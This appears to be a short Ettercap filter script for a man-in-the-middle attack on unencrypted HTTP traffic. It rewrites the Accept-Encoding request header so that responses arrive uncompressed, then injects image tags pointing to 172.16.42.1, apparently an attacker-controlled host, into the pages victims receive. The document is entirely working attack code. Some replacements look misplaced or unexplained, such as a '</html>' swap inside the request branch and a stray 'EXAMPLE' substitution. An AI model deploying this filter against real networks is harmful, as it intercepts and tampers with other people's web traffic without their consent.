if (ip.proto == TCP && tcp.dst == 80) {
   if (search(DATA.data, "Accept-Encoding")) {
      replace("Accept-Encoding", "Accept-Rubbish!");
      replace("</html>", "<img src='http://172.16.42.1/kitten.jpg'>");
  # note: replacement string is same length as original string
      msg("zapped Accept-Encoding!\n");
   replace("EXAMPLE", "rvya84m");
   }
}
if (ip.proto == TCP && tcp.src == 80) {
   msg("Filter Ran.\n");
   replace("IMG SRC=", "img src=\"http://172.16.42.1/kitten.jpg\" ");
   replace("EXAMPLE", "rvya84m");
}
